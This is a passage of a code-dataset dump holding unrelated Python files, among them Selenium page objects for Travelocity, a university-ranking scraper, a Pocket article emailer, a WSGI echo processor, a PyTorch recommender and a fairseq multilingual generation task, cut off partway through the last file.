{"seq_id":"357664632","text":"# -*- coding: cp1251 -*- #\r\n# Python 3.x.x\r\n\r\nimport logging\r\nfrom locators import *\r\n\r\n\r\ndef web_loger(func):\r\n    \"\"\" LOGGER \"\"\"\r\n    def wrapper(self, *argv, **kwargv):\r\n\r\n        logging.basicConfig(filename='web.log',\r\n                            filemode=\"w\",\r\n                            format='%(asctime)s - %(levelname)s - %(message)s',\r\n                            level=logging.INFO)\r\n        logging.info(func.__doc__)\r\n        return func(self, *argv, **kwargv)\r\n\r\n    return wrapper\r\n\r\n\r\nclass BasePage(object):\r\n    \"\"\"Base class to initialize the base page that will be called from all pages\"\"\"\r\n\r\n    def __init__(self, driver):\r\n        self.driver = driver\r\n\r\n\r\nclass MainPage(BasePage):\r\n\r\n    def __init__(self, driver):\r\n        super().__init__(driver)\r\n        self.main_page = MainPageLocators(driver=self.driver)\r\n\r\n    @web_loger\r\n    def is_title_matches(self):\r\n        \"\"\"check the site title\"\"\"\r\n        return \"Travelocity\" in self.driver.title\r\n\r\n    @web_loger\r\n    def select_car_flex(self):\r\n        \"\"\"first, click the FLEX car option\"\"\"\r\n        element = self.main_page.car_flex_btn\r\n        element.click()\r\n\r\n    @web_loger\r\n    def select_hotel_flex(self):\r\n        \"\"\"click the FLEX option with hotel selection\"\"\"\r\n        element = self.main_page.hotel_flex_btn\r\n        element.click()\r\n\r\n    @web_loger\r\n    def input_town_area(self):\r\n        \"\"\"enter the destination city\"\"\"\r\n        element = self.main_page.dest_input_text_area\r\n        element.send_keys('Japantown, San Francisco')\r\n        element.send_keys(Keys.DOWN)\r\n\r\n    @web_loger\r\n    def input_date_check_in(self):\r\n        \"\"\"enter the check-in date\"\"\"\r\n        check_in_data = self.main_page.input_date_check_in\r\n        check_in_data.clear()\r\n        check_in_data.send_keys('02/01/2019')\r\n\r\n    @web_loger\r\n    def input_date_check_out(self):\r\n        \"\"\"enter the check-out date\"\"\"\r\n        check_out_data = self.main_page.input_date_check_out\r\n        check_out_data.clear()\r\n\r\n        for i in range(11):\r\n            check_out_data.send_keys(Keys.BACK_SPACE)\r\n\r\n        check_out_data.send_keys('02/15/2019')\r\n\r\n    @web_loger\r\n    def click_search_btn(self):\r\n        \"\"\"click the search button\"\"\"\r\n        search_btn = self.main_page.search_btn\r\n        search_btn.click()\r\n\r\n\r\nclass HotelSelectPage(BasePage):\r\n\r\n    def __init__(self, driver):\r\n        super().__init__(driver)\r\n        self.select_page = HotelSelectPageLocators(driver=self.driver)\r\n\r\n    def is_title_matches(self):\r\n        return \"Japantown\" in self.driver.title\r\n\r\n    def select_hotel(self):\r\n        element = self.select_page.hotel\r\n        element.click()\r\n\r\n\r\nclass ChosenHotelPage(BasePage):\r\n\r\n    def __init__(self, driver):\r\n        super().__init__(driver)\r\n        self.driver.switch_to.window(self.driver.window_handles[1])\r\n        self.chosen_hotel = ChosenHotelLocators(driver=self.driver)\r\n\r\n    def is_title_matches(self):\r\n        return \"\" in self.driver.title\r\n\r\n    def get_hotel_name(self):\r\n        return self.chosen_hotel.hotel_name\r\n\r\n    def press_reserve_first(self):\r\n        element = self.chosen_hotel.reserve_btn_first\r\n        element.click()\r\n\r\n    def press_reserve_second(self):\r\n        for x_p in self.chosen_hotel.reserve_btn_second:\r\n            try:\r\n                x_path = By.XPATH, x_p\r\n                btn = WebDriverWait(self.driver, 5).until(EC.element_to_be_clickable(x_path))\r\n                # print(x_p)\r\n                btn.click()\r\n            except TimeoutException:\r\n                continue\r\n\r\n    def press_float_win_btn(self):\r\n        for x_p in self.chosen_hotel.float_win_btn:\r\n            try:\r\n                x_path = By.XPATH, x_p\r\n                # x_path = By.CSS_SELECTOR, x_p\r\n                fl_win_btn = WebDriverWait(self.driver, 5).until(EC.element_to_be_clickable(x_path))\r\n                fl_win_btn.click()\r\n            except TimeoutException:\r\n                continue\r\n\r\n\r\nclass PaymentPage(BasePage):\r\n    def __init__(self, driver):\r\n        super().__init__(driver)\r\n        self.payment_page = PaymentLocators(driver=self.driver)\r\n\r\n    def get_hotel_name(self):\r\n        return self.payment_page.hotel_name\r\n\r\n\r\n\r\n# used for debugging only\r\ndef main():\r\n\r\n    path_to_drv = \"../drv/chromedriver.exe\"\r\n    driver_index = webdriver.Chrome(executable_path=path_to_drv)\r\n    driver_index.get(\"https://www.travelocity.com/\")\r\n\r\n    print(driver_index.title)\r\n\r\n    # -----------------------------------\r\n    main_page_instant = MainPage(driver=driver_index)\r\n    main_page_instant.select_car_flex()\r\n    main_page_instant.select_hotel_flex()\r\n\r\n    main_page_instant.input_town_area()\r\n\r\n    main_page_instant.input_date_check_in()\r\n    main_page_instant.input_date_check_out()\r\n\r\n    main_page_instant.click_search_btn()\r\n\r\n    # -----------------------------------\r\n    hotel_sel_page = HotelSelectPage(driver=driver_index)\r\n    hotel_sel_page.select_hotel()\r\n\r\n    # -----------------------------------\r\n    chosen_hotel_page = ChosenHotelPage(driver=driver_index)\r\n    print(chosen_hotel_page.get_hotel_name())\r\n    chosen_hotel_page.press_reserve_first()\r\n    chosen_hotel_page.press_reserve_second()\r\n    chosen_hotel_page.press_float_win_btn()\r\n\r\n    # -----------------------------------\r\n    pay_page = PaymentPage(driver=driver_index)\r\n    print(pay_page.get_hotel_name())\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n    main()\r\n    input()","sub_path":"trevelocity/page.py","file_name":"page.py","file_ext":"py","file_size_in_byte":5623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"341895130","text":"import requests\nfrom bs4 import BeautifulSoup\n\ndef getHTMLText(url):\n    try:\n        req = requests.get(url,timeout=30)\n        req.raise_for_status()\n        req.encoding='utf-8'\n        return req.text\n    except:\n        return \"\"\ndef fillUnivList(text):\n    allUniv=[]\n    # use html.parser as the parser for BeautifulSoup\n    soup = BeautifulSoup(text,\"html.parser\")\n    trList = soup.find_all('tr')\n    for tr in trList:\n        ltd = tr.find_all('td')\n        if len(ltd)==0:\n            continue\n        singleUniv=[]\n        for td in ltd:\n            singleUniv.append(td.string)\n        allUniv.append(singleUniv)\n    return allUniv\n\ndef printUnivList(num,ulist):\n    print(\"{1:{0}^4}{2:{0}^10}{3:{0}^5}{4:{0}^10}\".format(chr(12288),\"Rank\",\"University\",\"Province\",\"Score\"))\n    for i in range(num):\n        row = ulist[i]\n        print(\"{1:{0}^4}{2:{0}^10}{3:{0}^5}{4:{0}^10}\".format(chr(12288),row[0].strip(),row[1].strip(),row[2].strip(),row[3].strip()))\nif __name__ == '__main__':\n    url='http://www.zuihaodaxue.com/zuihaodaxuepaiming2019.html'\n    html = getHTMLText(url)\n    allData=fillUnivList(html)\n    # print(len(allData))\n    printUnivList(549,allData)","sub_path":"python/Reptile/大学排名/zuihaodaxue.py","file_name":"zuihaodaxue.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"498914043","text":"import requests\nimport json\nimport random\n\n# Select a random number to use as the request offset\n\noffset_randomiser = random.choice(range(100,1000))\n\n# Parameters to get articles from pocket\n\npayload = {\"count\": \"10\", \"sort\": \"oldest\", \"offset\": str(offset_randomiser), \"consumer_key\": \"POCKET CONSUMER KEY\", \"access_token\": \"POCKET ACCESS TOKEN\"}\n\nr = requests.post(\"https://getpocket.com/v3/get\", data = payload)\n\nr_dict = json.loads(r.text)\n\nitems = r_dict['list']\n\nitem_number_list = []\ntitle_links_list = []\n\n# Create a list of article ID numbers as well as a list of tuples with article name and link\n\nfor k, v in items.items():\n    item_number_list.append(k)\n    title_links_tuple = (v['resolved_title'], v['resolved_url'])\n    title_links_list.append(title_links_tuple)\n\n# Create a string with just article names and links\n\nmessage = \"\".join(\"%s\\n %s\\n\" % tup for tup in title_links_list)\n\n# Archive the articles that have been selected using the article ID\n\nfor item in item_number_list:\n    r2 = requests.post('https://getpocket.com/v3/send', data={\n        'consumer_key': 'POCKET CONSUMER KEY',\n        'access_token': 'POCKET ACCESS TOKEN',\n        'actions': json.dumps([{\n            'item_id': '{}'.format(item),\n            'action':'archive'\n        }])\n    })\n\n# Send an email using mailgun with the list of articles\n\ndef send_list():\n\treturn requests.post(\n\t\t\"MAILGUN API ENDPOINT\",\n\t\tauth=(\"api\", \"API KEY\"),\n\t\tdata={\"from\": \"NAME \",\n\t\t\t\"to\": [\"RECEIVING EMAIL ADDRESS\"],\n\t\t\t\"subject\": \"Random pocket articles\",\n\t\t\t\"text\": \"\"\"\n    Howdy,\n\n    Here's a yummy list of stuff to read:\n\n    {}\"\"\".format(message)})\n\nsend_list()\n","sub_path":"pocketdiver.py","file_name":"pocketdiver.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
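The ranking scraper above walks the table's <tr> rows and collects each row's <td> cells; the same pattern on a tiny inline document, so it runs without any network access:

from bs4 import BeautifulSoup

html = '<table><tr><td>1</td><td>Tsinghua</td></tr><tr><td>2</td><td>PKU</td></tr></table>'
soup = BeautifulSoup(html, 'html.parser')
rows = []
for tr in soup.find_all('tr'):
    cells = [td.string for td in tr.find_all('td')]
    if cells:
        rows.append(cells)
print(rows)   # [['1', 'Tsinghua'], ['2', 'PKU']]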
{"seq_id":"295519590","text":"\"\"\" wireframe: Minimalistic Web Resource Framework built on Python WSGI.\n\nProcessor for producing an echo response including values from the request.\n\nPer Kraulis\n2011-01-25 split out of response.py\n\"\"\"\n\n\nclass EchoProcessor(object):\n    \"Return a response containing the values of the request items.\"\n\n    def __init__(self, title='Echo request',\n                 path_values=True, environ=True, headers=True,\n                 cookie=True, cgi_fields=True, user=True):\n        self.title = title\n        self.path_values = path_values\n        self.environ = environ\n        self.headers = headers\n        self.cookie = cookie\n        self.cgi_fields = cgi_fields\n        self.user = user\n\n    def __call__(self, request, response):\n        response['Content-Type'] = 'text/plain'\n        response.append(\"%s\\n\" % self.title)\n        if self.path_values:\n            response.append(\"URL path values: %s\\n\" % request.path_values)\n            response.append(\"URL path named values: %s\\n\"\n                            % request.path_named_values.items())\n        if self.environ:\n            response.append('environ:\\n')\n            for item in sorted(request.environ.items()):\n                response.append(\"  %s = %s\\n\" % item)\n        if self.headers:\n            response.append('headers:\\n')\n            for key in request.headers:\n                response.append(\"  %s = %s\\n\" % (key, request.headers[key]))\n        if self.cookie:\n            response.append(\"cookie: %s\\n\" % request.cookie)\n        if self.cgi_fields:\n            response.append(\"CGI fields: %s\\n\" % request.cgi_fields)\n        if self.user:\n            response.append(\"User: %s\\n\" % request.user)\n            response.append(\"Password: %s\\n\" % request.password)\n","sub_path":"echo_processor.py","file_name":"echo_processor.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"533105182","text":"#!/usr/bin/python\n#\nimport sys\nimport numpy as np\n#\nf = open(sys.argv[1], \"r\")\n#\n#SOB_B_A-14-22549G-100-030-550-150.png;0;0.129226;0.004267;0.007883;0.004518;0.175048;0.000307;0.677721;0.001031;\n#\nt = 0\nY = []\nW = []\nZ = []\n#\nfor i in f:\n    if(t == 0):\n        t += 1\n        continue\n    else:\n        linha = i.split(\";\")\n        Y.append(int(linha[1]))\n        wtmp = list()\n        for j in linha[2:-1]:\n            wtmp.append(float(j))\n        W.append(wtmp)\n        Z.append(linha[0])\n#\nf.close()\n#\n#print(len(Y), len(W), len(Z))\n#\npac_vot = {}\nimg_vot = {}\npac = {}\nimg = {}\n#\ncorrect = 0\ntotal = 0\nfor i in range(len(Y)):\n    if(Y[i] == np.argmax(W[i])):\n        correct += 1\n    total += 1\ne = float(correct)/total\n#\nfor i in range(len(Y)):\n    img_name = Z[i].split(\"-\")\n    pac_str = img_name[0]+\"-\"+img_name[1]+\"-\"+img_name[2]\n    img_str = img_name[0]+\"-\"+img_name[1]+\"-\"+img_name[2]+\"-\"+img_name[3]+\"-\"+img_name[4]\n    if(img_str in img):\n        a = np.add(img[img_str][1], W[i])\n        img[img_str][1] = a\n        img[img_str][2][np.argmax(W[i])] += 1\n    else:\n        a = [0 for j in range(len(W[i]))]\n        np_a = np.array(a)\n        np_a = np.add(np_a, W[i])\n        np_b = np.array(a)\n        np_b[np.argmax(W[i])] += 1\n        # 1 - sum\n        # 2 - vote\n        img[img_str] = [Y[i], np_a, np_b]\n#\nimg_correto_sum = 0\nimg_correto_vot = 0\nimg_total = 0\nfor i in img:\n    #print(i)\n    if(img[i][0] == np.argmax(img[i][1])):\n        img_correto_sum += 1\n    if(img[i][0] == np.argmax(img[i][2])):\n        img_correto_vot += 1\n    img_total += 1\na = float(img_correto_sum)/img_total\nb = float(img_correto_vot)/img_total\n#\npac = {}\n#\nfor i in img:\n    pac_name = i.split(\"-\")\n    pac_str = pac_name[0]+\"-\"+pac_name[1]+\"-\"+pac_name[2]\n    correto_sum = 0\n    correto_vot = 0\n    if(img[i][0] == np.argmax(img[i][1])):\n        correto_sum = 1\n    if(img[i][0] == np.argmax(img[i][2])):\n        correto_vot = 1\n\n    if(pac_str in pac):\n        pac[pac_str][0] += correto_sum\n        pac[pac_str][1] += correto_vot\n        pac[pac_str][2] += 1\n    else:\n        pac[pac_str] = [0,0,0]\n        pac[pac_str][0] = correto_sum\n        pac[pac_str][1] = correto_vot\n        pac[pac_str][2] = 1\n#\nmedia_sum = 0\nmedia_vot = 0\n#\nt = 0\n#\nfor i in pac:\n    t += 1\n    media_sum += float(pac[i][0])/pac[i][2]\n    media_vot += float(pac[i][1])/pac[i][2]\n    #print(\"{} {} {} {}\".format(i, pac[i][0], pac[i][1], pac[i][2] ))\n#\nc = float(media_sum)/t\nd = float(media_vot)/t\n#\nprint(\"{};{:.4f};{:.4f};{:.4f};{:.4f};{:.4f}\".format(sys.argv[1], e, a, b, c, d))\n\n","sub_path":"process_results_tensorflow.py","file_name":"process_results_tensorflow.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
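Both aggregation modes in the results script above reduce to an argmax over accumulated per-class scores, either summed probabilities or counted votes; a toy check with fabricated patch-level predictions for one image and two classes:

import numpy as np

probs = np.array([[0.6, 0.4], [0.2, 0.8], [0.9, 0.1]])
summed = probs.sum(axis=0)                               # sum rule: [1.7, 1.3]
votes = np.bincount(probs.argmax(axis=1), minlength=2)   # majority vote: [2, 1]
print(summed.argmax(), votes.argmax())                   # 0 0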
{"seq_id":"619306456","text":"import torch\nfrom GMFRecommender import GMF\n\nclass MLP(torch.nn.Module):\n    def __init__(self, params):\n        super(MLP, self).__init__()\n        self.params = params\n        self.num_users = params['num_users']\n        self.num_items = params['num_items']\n        self.latent_dim = params['latent_dim']\n\n        self.user_embedding = torch.nn.Embedding(self.num_users, self.latent_dim)\n        self.item_embedding = torch.nn.Embedding(self.num_items, self.latent_dim)\n\n        self.fc_layers = torch.nn.ModuleList()\n        for _, (in_size, out_size) in enumerate(zip(params['layers'][:-1], params['layers'][1:])):\n            self.fc_layers.append(torch.nn.Linear(in_size, out_size))\n\n        self.relu = torch.nn.ReLU()\n        self.affine_output = torch.nn.Linear(params['layers'][-1], 1)\n        self.logistic = torch.nn.Sigmoid()\n\n    def forward(self, user_indices, item_indices):\n        user_vec = self.user_embedding(user_indices)\n        item_vec = self.item_embedding(item_indices)\n\n        vec = torch.cat([user_vec, item_vec], dim=-1)\n\n        for _, layer in enumerate(self.fc_layers):\n            vec = layer(vec)\n            vec = self.relu(vec)\n            vec = torch.nn.Dropout(p=0.5)(vec)\n        out = self.affine_output(vec)\n        rating = self.logistic(out)\n\n        return rating\n\n    def load_pretrain(self, dirs):\n        params = self.params\n        gmf = GMF(params)\n\n        state_dict = torch.load(dirs)\n        gmf.load_state_dict(state_dict)\n\n        self.user_embedding.weight.data = gmf.user_embedding.weight.data\n        self.item_embedding.weight.data = gmf.item_embedding.weight.data\n\n\n# mlp = MLP(params)\n# mlp.load_pretrain(dirs)","sub_path":"src/model/MLPRecommender.py","file_name":"MLPRecommender.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
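A minimal smoke test for the MLP class above, assuming the class is importable; the params dict mirrors the keys the constructor reads, with made-up sizes. Note that layers[0] must equal 2 * latent_dim because the user and item embeddings are concatenated before the first linear layer:

import torch

params = {'num_users': 100, 'num_items': 50, 'latent_dim': 8,
          'layers': [16, 32, 16, 8]}   # 16 = 2 * latent_dim
model = MLP(params)
users = torch.tensor([0, 3, 7])
items = torch.tensor([1, 4, 9])
print(model(users, items).shape)   # torch.Size([3, 1])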
input(\"Introduzca su dni: \")\r\n f = input(\"Introduzca fecha de nacimiento: \")\r\n t = input(\"Introduzca su numero de teléfono: \")\r\n\r\n elif opcionMenu == \"2\":\r\n input(\"Pulse enter para continuar.\")\r\n \r\n elif opcionMenu == \"3\":\r\n input(\"Pulse enter para continuar.\")\r\n \r\n elif opcionMenu == \"4\":\r\n input(\"Pulse enter para continuar.\")\r\n \r\n elif opcionMenu == \"5\":\r\n input(\"Pulse enter para continuar.\")\r\n \r\n elif opcionMenu == \"6\":\r\n input(\"Pulse enter para continuar.\")\r\n \r\n elif opcionMenu == \"7\":\r\n print(\"Saliendo....\")\r\n break\r\n else:\r\n input(\"No has pulsado ninguna opción correcta...\\npulsa una tecla para continuar\")","sub_path":"Apuntes/AccesoDatos.py","file_name":"AccesoDatos.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"28270769","text":"# Copyright (c) Facebook, Inc. and its affiliates.\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\nimport os\nimport torch\nimport logging\nimport itertools\nimport numpy as np\n\nfrom fairseq.data import GenerationMultiPairDataset \nfrom fairseq import options, utils\n\nfrom .translation import TranslationTask\nfrom . import register_task\n\nfrom fairseq.data import (\n AppendTokenDataset,\n ConcatDataset,\n SortDataset,\n data_utils,\n encoders,\n indexed_dataset,\n ResamplingDataset,\n LanguagePairDataset,\n PrependTokenDataset,\n StripTokenDataset,\n TruncateDataset,\n)\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef load_generation_pair_dataset(\n data_path, split,\n tgt,\n src_dict,\n tgt_dict,\n combine, dataset_impl, upsample_primary,\n left_pad_source, left_pad_target, max_source_positions,\n max_target_positions, prepend_bos=False, load_alignments=False,\n truncate_source=False, append_source_id=False, common_eos=None,\n lg_id=None\n):\n\n def split_exists(split, src, tgt, lang, data_path):\n filename = os.path.join(data_path, '{}.{}-{}.{}'.format(split, src, tgt, lang))\n return indexed_dataset.dataset_exists(filename, impl=dataset_impl)\n\n src_datasets = []\n tgt_datasets = []\n\n for k in itertools.count():\n split_k = split + (str(k) if k > 0 else '')\n\n # infer langcode\n if split_exists(split_k, \"src\", \"tgt\", \"src\", data_path):\n prefix = os.path.join(data_path, '{}.{}-{}.'.format(split_k, \"src\", \"tgt\"))\n elif split_exists(split_k, \"tgt\", \"src\", \"src\", data_path):\n prefix = os.path.join(data_path, '{}.{}-{}.'.format(split_k, \"tgt\", \"src\"))\n else:\n if k > 0:\n break\n else:\n raise FileNotFoundError('Dataset not found: {} ({})'.format(split, data_path))\n\n src_dataset = data_utils.load_indexed_dataset(prefix + \"src\", src_dict, dataset_impl)\n if truncate_source:\n src_dataset = AppendTokenDataset(\n TruncateDataset(\n StripTokenDataset(src_dataset, src_dict.eos()),\n max_source_positions - 1,\n ),\n src_dict.eos(),\n )\n src_datasets.append(src_dataset)\n\n tgt_dataset = data_utils.load_indexed_dataset(prefix + \"tgt\", tgt_dict, dataset_impl)\n\n if tgt_dataset is not None:\n tgt_datasets.append(tgt_dataset)\n\n logger.info('{} {} {}-{} {} examples'.format(\n data_path, split_k, \"src\", \"tgt\", len(src_datasets[-1])\n ))\n\n if not combine:\n break\n\n assert len(src_datasets) == len(tgt_datasets) or len(tgt_datasets) == 0\n\n if len(src_datasets) == 1:\n src_dataset = src_datasets[0]\n tgt_dataset = tgt_datasets[0] if len(tgt_datasets) > 0 else 
{"seq_id":"28270769","text":"# Copyright (c) Facebook, Inc. and its affiliates.\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\nimport os\nimport torch\nimport logging\nimport itertools\nimport numpy as np\n\nfrom fairseq.data import GenerationMultiPairDataset \nfrom fairseq import options, utils\n\nfrom .translation import TranslationTask\nfrom . import register_task\n\nfrom fairseq.data import (\n    AppendTokenDataset,\n    ConcatDataset,\n    SortDataset,\n    data_utils,\n    encoders,\n    indexed_dataset,\n    ResamplingDataset,\n    LanguagePairDataset,\n    PrependTokenDataset,\n    StripTokenDataset,\n    TruncateDataset,\n)\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef load_generation_pair_dataset(\n    data_path, split,\n    tgt,\n    src_dict,\n    tgt_dict,\n    combine, dataset_impl, upsample_primary,\n    left_pad_source, left_pad_target, max_source_positions,\n    max_target_positions, prepend_bos=False, load_alignments=False,\n    truncate_source=False, append_source_id=False, common_eos=None,\n    lg_id=None\n):\n\n    def split_exists(split, src, tgt, lang, data_path):\n        filename = os.path.join(data_path, '{}.{}-{}.{}'.format(split, src, tgt, lang))\n        return indexed_dataset.dataset_exists(filename, impl=dataset_impl)\n\n    src_datasets = []\n    tgt_datasets = []\n\n    for k in itertools.count():\n        split_k = split + (str(k) if k > 0 else '')\n\n        # infer langcode\n        if split_exists(split_k, \"src\", \"tgt\", \"src\", data_path):\n            prefix = os.path.join(data_path, '{}.{}-{}.'.format(split_k, \"src\", \"tgt\"))\n        elif split_exists(split_k, \"tgt\", \"src\", \"src\", data_path):\n            prefix = os.path.join(data_path, '{}.{}-{}.'.format(split_k, \"tgt\", \"src\"))\n        else:\n            if k > 0:\n                break\n            else:\n                raise FileNotFoundError('Dataset not found: {} ({})'.format(split, data_path))\n\n        src_dataset = data_utils.load_indexed_dataset(prefix + \"src\", src_dict, dataset_impl)\n        if truncate_source:\n            src_dataset = AppendTokenDataset(\n                TruncateDataset(\n                    StripTokenDataset(src_dataset, src_dict.eos()),\n                    max_source_positions - 1,\n                ),\n                src_dict.eos(),\n            )\n        src_datasets.append(src_dataset)\n\n        tgt_dataset = data_utils.load_indexed_dataset(prefix + \"tgt\", tgt_dict, dataset_impl)\n\n        if tgt_dataset is not None:\n            tgt_datasets.append(tgt_dataset)\n\n        logger.info('{} {} {}-{} {} examples'.format(\n            data_path, split_k, \"src\", \"tgt\", len(src_datasets[-1])\n        ))\n\n        if not combine:\n            break\n\n    assert len(src_datasets) == len(tgt_datasets) or len(tgt_datasets) == 0\n\n    if len(src_datasets) == 1:\n        src_dataset = src_datasets[0]\n        tgt_dataset = tgt_datasets[0] if len(tgt_datasets) > 0 else None\n    else:\n        sample_ratios = [1] * len(src_datasets)\n        sample_ratios[0] = upsample_primary\n        src_dataset = ConcatDataset(src_datasets, sample_ratios)\n        if len(tgt_datasets) > 0:\n            tgt_dataset = ConcatDataset(tgt_datasets, sample_ratios)\n        else:\n            tgt_dataset = None\n\n    if prepend_bos:\n        assert hasattr(src_dict, \"bos_index\") and hasattr(tgt_dict, \"bos_index\")\n        src_dataset = PrependTokenDataset(src_dataset, src_dict.bos())\n        if tgt_dataset is not None:\n            tgt_dataset = PrependTokenDataset(tgt_dataset, tgt_dict.bos())\n\n    eos = None\n    if append_source_id:\n        if tgt_dataset is not None:\n            tgt_dataset = PrependTokenDataset(tgt_dataset, lg_id)\n    if common_eos is not None:\n        src_dataset = AppendTokenDataset(src_dataset, src_dict.index('[{}]'.format(common_eos)))\n        if tgt_dataset is not None:\n            tgt_dataset = AppendTokenDataset(tgt_dataset, tgt_dict.index('[{}]'.format(common_eos)))\n        eos = tgt_dict.index('[{}]'.format(common_eos))\n\n    bos = tgt_dict.index('[{}]'.format(tgt))\n\n    align_dataset = None\n    if load_alignments:\n        align_path = os.path.join(data_path, '{}.align.{}-{}'.format(split, \"src\", \"tgt\"))\n        if indexed_dataset.dataset_exists(align_path, impl=dataset_impl):\n            align_dataset = data_utils.load_indexed_dataset(align_path, None, dataset_impl)\n\n    tgt_dataset_sizes = tgt_dataset.sizes if tgt_dataset is not None else None\n    return GenerationMultiPairDataset(\n        src_dataset, src_dataset.sizes, src_dict,\n        tgt_dataset, tgt_dataset_sizes, tgt_dict,\n        left_pad_source=left_pad_source,\n        left_pad_target=left_pad_target,\n        max_source_positions=max_source_positions,\n        max_target_positions=max_target_positions,\n        align_dataset=align_dataset, eos=eos, bos=bos \n    )\n\n\n@register_task('multilingual_generation_from_bart')\nclass MultilingualGenerationFromBARTTask(TranslationTask):\n    \"\"\"\n    Translate from source language to target language with a model initialized with a multilingual pretrain.\n\n    Args:\n        src_dict (~fairseq.data.Dictionary): dictionary for the source language\n        tgt_dict (~fairseq.data.Dictionary): dictionary for the target language\n\n    .. note::\n\n        The translation task is compatible with :mod:`fairseq-train`,\n        :mod:`fairseq-generate` and :mod:`fairseq-interactive`.\n\n    The translation task provides the following additional command-line\n    arguments:\n\n    .. argparse::\n        :ref: fairseq.tasks.translation_parser\n        :prog:\n    \"\"\"\n\n    @staticmethod\n    def add_args(parser):\n        \"\"\"Add task-specific arguments to the parser.\"\"\"\n        # fmt: off\n        TranslationTask.add_args(parser)\n        parser.add_argument('--langs', required=True, metavar='LANG',\n                            help='comma-separated list of monolingual languages, for example, \"en,de,fr\". '\n                                 'Be careful: these langs are what you used for pretraining (in the same order), '\n                                 'not for finetuning. '\n                                 'You should always add all pretraining language indices during finetuning.')\n        parser.add_argument('--multilang-sampling-alpha', type=float, default=0.7,\n                            help='sub sampling factor')\n        parser.add_argument('--common_eos', type=str,\n                            help='common eos symbol for all languages')\n        parser.add_argument('--placeholder', type=int, default=0,\n                            help='number of placeholders in dictionaries')\n        parser.add_argument('--gt-langs', type=str,\n                            help=\"languages used in generation finetuning, separated with -, for example, 'en-fr-de'\")\n\n        # fmt: on\n\n    def __init__(self, args, src_dict, tgt_dict):\n        super().__init__(args, src_dict, tgt_dict)\n        self.langs = args.langs.split(',')\n        for d in [src_dict, tgt_dict]:\n            d.add_symbol('<mask>')\n            if args.common_eos is not None:\n                d.add_symbol('[{}]'.format(args.common_eos))\n            for l in self.langs:\n                d.add_symbol('[{}]'.format(l))\n            for i in range(args.placeholder):\n                d.add_symbol('[placeholder_{}]'.format(i))\n\n        if args.gt_langs is None:\n            self.gt_langs = [args.source_lang]\n        else:\n            self.gt_langs = args.gt_langs.split('-')\n\n        assert len(self.gt_langs) > 0\n        for lg in self.gt_langs:\n            assert lg in self.langs\n\n    @classmethod\n    def setup_task(cls, args, **kwargs):\n        \"\"\"Setup the task (e.g., load dictionaries).\n\n        Args:\n            args (argparse.Namespace): parsed command-line arguments\n        \"\"\"\n        args.left_pad_source = options.eval_bool(args.left_pad_source)\n        args.left_pad_target = options.eval_bool(args.left_pad_target)\n\n        paths = utils.split_paths(args.data)\n        assert len(paths) > 0\n        # find language pair automatically\n        if args.source_lang is None or args.target_lang is None:\n            args.source_lang, args.target_lang = data_utils.infer_language_pair(paths[0])\n        if args.source_lang is None or args.target_lang is None:\n            raise Exception('Could not infer language pair, please provide it explicitly')\n\n        # load dictionaries\n        src_dict = cls.load_dictionary(os.path.join(paths[0], args.source_lang, 'dict.src.txt'))\n        tgt_dict = cls.load_dictionary(os.path.join(paths[0], args.target_lang, 'dict.tgt.txt'))\n        assert src_dict.pad() == tgt_dict.pad()\n        assert src_dict.eos() == tgt_dict.eos()\n        assert src_dict.unk() == tgt_dict.unk()\n        logger.info('[{}] dictionary: {} types'.format(args.source_lang, len(src_dict)))\n        logger.info('[{}] dictionary: {} types'.format(args.target_lang, len(tgt_dict)))\n\n        return cls(args, src_dict, tgt_dict)\n\n    def _get_sample_prob(self, dataset_lens):\n        \"\"\"\n        Get smoothed sampling probability by languages. This helps low resource\n        languages by upsampling them.\n        \"\"\"\n        prob = dataset_lens / dataset_lens.sum()\n        smoothed_prob = prob ** self.args.multilang_sampling_alpha\n        smoothed_prob = smoothed_prob / smoothed_prob.sum()\n        return smoothed_prob\n\n    def load_dataset(self, split, epoch=1, combine=False, **kwargs):\n        \"\"\"Load a given dataset split.\n\n        Args:\n            split (str): name of the split (e.g., train, valid, test)\n        \"\"\"\n        paths = self.args.data.split(':')\n        assert len(paths) > 0\n        data_path = paths[(epoch - 1) % len(paths)]\n\n        # infer langcode\n        lg_datasets = []\n        for lg in self.gt_langs:\n            src, tgt = lg, lg \n            bos_id = self.tgt_dict.index('[{}]'.format(lg))\n            data_path_lg = os.path.join(data_path, lg)\n            dataset = load_generation_pair_dataset(\n                data_path_lg, split, tgt, self.src_dict, self.tgt_dict,\n                combine=combine, dataset_impl=self.args.dataset_impl,\n                upsample_primary=self.args.upsample_primary,\n                left_pad_source=self.args.left_pad_source,\n                left_pad_target=self.args.left_pad_target,\n                max_source_positions=getattr(self.args, 'max_source_positions', 1024),\n                max_target_positions=getattr(self.args, 'max_target_positions', 1024),\n                load_alignments=self.args.load_alignments,\n                prepend_bos=getattr(self.args, 'prepend_bos', False),\n                append_source_id=True,\n                common_eos=self.args.common_eos,\n                lg_id=bos_id\n            )\n            lg_datasets.append(dataset)\n\n        dataset_lengths = np.array([len(d) for d in lg_datasets], dtype=float) \n\n        sample_probs = self._get_sample_prob(dataset_lengths)\n        logger.info(\"| Sample probability by language: %s\", {\n                lang: \"{0:.4f}\".format(sample_probs[id])\n                for id, lang in enumerate(self.gt_langs)\n            }\n        )\n        size_ratio = (sample_probs * dataset_lengths.sum()) / dataset_lengths\n        logger.info(\"| Up/Down Sampling ratio by language: %s\", {\n                lang: 